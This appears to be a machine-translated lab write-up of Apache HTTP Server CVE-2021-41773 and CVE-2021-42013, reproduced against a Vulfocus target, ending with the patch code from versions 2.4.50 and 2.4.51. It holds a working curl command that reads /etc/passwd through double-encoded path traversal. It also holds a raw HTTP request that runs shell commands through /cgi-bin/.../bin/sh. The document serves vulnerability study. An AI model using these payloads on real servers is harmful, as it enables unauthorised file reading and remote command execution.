1, Vulnerability overview
Apache HTTP Server (APACHE for short) is an open source Web server, which can run in most computer operating systems. Because of its multi platform and security, it is widely used. It is one of the most popular Web server-side software. It is fast, reliable, and can compile interpreters such as Perl/Python into the server through simple API extensions.
Apache has disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, called CVE-2021-41773. An update to 2.4.50 has also been released to fix this vulnerability. This vulnerability allows an attacker to bypass path traversal protection, encode and read arbitrary files on the network server file system. Both Linux and Windows servers running this version of Apache are affected. This vulnerability was introduced in 2.4.49. This patch is designed to improve the performance of URL verification. You can use the "." Code to bypass the new authentication method. If the Apache Web server configuration is not set to "require all rejections", the vulnerability exploitation is relatively simple. By encoding these characters and modifying the URL with the payload, you can achieve the classic path traversal.
-https://blog.csdn.net/qq_48985780/article/details/120973100
- 41773 - version equal to 2.4.49
- 42013 - version equal to 2.4.49/50
3, Vulnerability principle
- Trick about%2e in SpringBoot
- What is the problem with the vulnerable function
- What is directory traversal
4, Vulnerability recurrence environment
Kali Linux + Vulfocus
Infiltration machine: Kali Linux
Target: Vulfocus
5, Experimental steps
1. open the image environment and access the page
2. Try to view the contents of /etc/passwd using the POC command that has been exploded
curl -v --path-as-is http://192.168.117.131: 51212/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
3.brup constructs the following data packets, obtains the flag, and finishes scattering flowers
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: 192.168.117.131:51212 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 If-None-Match: "29cd-5cde381698600-gzip" If-Modified-Since: Sat, 09 Oct 2021 03:58:16 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 13 echo;ls /tmp
6, Repair method
1) 41773 - version 2.4.50 for AP_ normalize_ The path function is modified, and the following code is added. For.% 2e, which can avoid using this method.
if ((path[n] == '.' || (decode_unreserved
&& path[n] == '%'
&& path[++n] == '2'
&& (path[++n] == 'e'
|| path[n] == 'E')))
&& IS_SLASH_OR_NUL(path[n + 1])) {
/* Wind w back to remove the previous segment */
if (w > 1) {
do {
w--;
} while (w && !IS_SLASH(path[w - 1]));
}
else {
/* Already at root, ignore and return a failure
* if asked to.
*/
if (flags & AP_NORMALIZE_NOT_ABOVE_ROOT) {
ret = 0;
}
}
/* Move l forward to the next segment */
l = n + 1;
if (path[l]) {
l++;
}
continue;
}
--https://xz.aliyun.com/t/10359?page=1
2) 42013 - version 2.4.51 has made several modifications to this vulnerability. The core modification is in the AP_ normalize_ The verification of url encoding is strengthened in the path function. If a non-standard url encoding (% + two hexadecimal characters) is detected, an encoding error is returned, which fundamentally eliminates the possible bypass caused by multiple encoding. The repair code is as follows:
while (path[l] != '\0') { /* RFC-3986 section 2.3: * For consistency, percent-encoded octets in the ranges of * ALPHA (%41-%5A and %61-%7A), DIGIT (%30-%39), hyphen (%2D), * period (%2E), underscore (%5F), or tilde (%7E) should [...] * be decoded to their corresponding unreserved characters by * URI normalizers. */ if (decode_unreserved && path[l] == '%') { if (apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) { const char c = x2c(&path[l + 1]); if (TEST_CHAR(c, T_URI_UNRESERVED)) { /* Replace last char and fall through as the current * read position */ l += 2; path[l] = c; } } else { /* Invalid encoding */ ret = 0; } }--https://xz.aliyun.com/t/10359?page=1